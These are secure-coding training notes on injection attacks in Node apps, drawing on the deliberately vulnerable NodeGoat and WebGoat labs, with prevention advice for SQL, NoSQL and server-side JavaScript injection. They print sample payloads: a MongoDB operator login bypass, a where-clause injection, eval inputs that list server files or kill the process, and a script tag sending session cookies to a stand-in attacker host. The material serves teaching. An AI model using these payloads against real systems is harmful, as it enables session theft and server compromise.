# Injection Attacks & Prevention

Secure Coding: Use with Injecction Attacks & Prevention Power Point Presentation   
https://gitlab.com/ReddingBacon/docs-and-training/-/blob/master/Injection_Prevention.pptx

## Notes

Vulnerable apps as examples:

* NodeGoat https://nodegoat.herokuapp.com/
* Tutorial:  https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_server_side_js_injection.html
* WebGoat 
* evil-node - GitLab project

## SQL Injection

WebGoat SQL Injection
Search for guest, smith
 
Prevention:

    * Do Not generate SQL dynamically, use: 
        * Prepared Statements/Parameterized Queries
        * Stored Procedures
    * Input Validation - White List
    * Escaping
    * Least Privilege 

## NoSQL Injection

NodeGoat

### Goto allocations

Play around
‘  à MongoDB
 
Problem
Accepts JSON parameters:
db.accounts.find({username: username, password: password});
 
{
    "username": "admin",
    "password": {$gt: ""}
}
 
NodeGoat / app /data / alocations-dao.js
`this.userId == ${parsedUserId} && this.stocks > '${threshold}'
this.userId == 1 && this.stocks > ‘1’; 
this.userId == 1 && this.stocks > ‘1’; return 1=’1’;  

### 1’; return 1=1’ 

 

### Prevent

https://github.com/OWASP/NodeGoat/blob/master/app/data/allocations-dao.js
Here are some measures to prevent SQL / NoSQL injection attacks, or minimize impact if it happens:

* Input  Validation: Validate inputs to detect malicious values. For NoSQL  databases, also validate input types against expected types
* Least Privilege:  To minimize the potential damage of a successful injection attack, do not  assign DBA or admin type access rights to your application accounts.  Similarly minimize the privileges of the operating system account that the  database process runs under.

## Server-Side Injection

In NodeGoat, Goto Contributions
Play around with it
2 * 2
Req.body.preTax()
res.end(“I own you!!”)

```
`res.end(require('fs').readdirSync('.').toString())`
```


process.exit()
 

### Problem

``        `// Insecure use of eval() to parse inputs`
``        `var preTax = eval(req.body.preTax);`
``        `var afterTax = eval(req.body.afterTax);`
``        `var roth = eval(req.body.roth);`
 

```
`        //Fix for A1 -1 SSJS Injection attacks - uses alternate method to eval`
`        var preTax = parseInt(req.body.preTax);`
`        var afterTax = parseInt(req.body.afterTax);`
`        var roth = parseInt(req.body.roth);`
```


 
 

### Prevent

To prevent server-side js injection attacks:

* Validate user inputs  on server side before processing
* Do not use `eval()`function to parse  user inputs. Avoid using other commands with similar effect, such as `setTimeOut()`, `setInterval()`, and `Function()`.
* For parsing JSON  input, instead of using `eval()`, use a safer  alternative such as `JSON.parse()`. For type  conversions use type related `parseXXX()`methods.
* Include `"use  strict"`at  the beginning of a function, which enables [strict mode](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions_and_function_scope/Strict_mode)within the enclosing function scope.

Are all vulnerable:

    * eval() 
    * setTimeout() 
    * setInterval()

## Command Injection

Go to Evil-node, then index.js
 

## Path Manipulation

## Log Injection

https://github.com/OWASP/NodeGoat/blob/master/app/routes/session.js
 
 
<script>new XMLHttpRequest().send([http://bad-guy.is](http://bad-guy.is/) + document.cookie.match(“SESSSIONID”);</script>

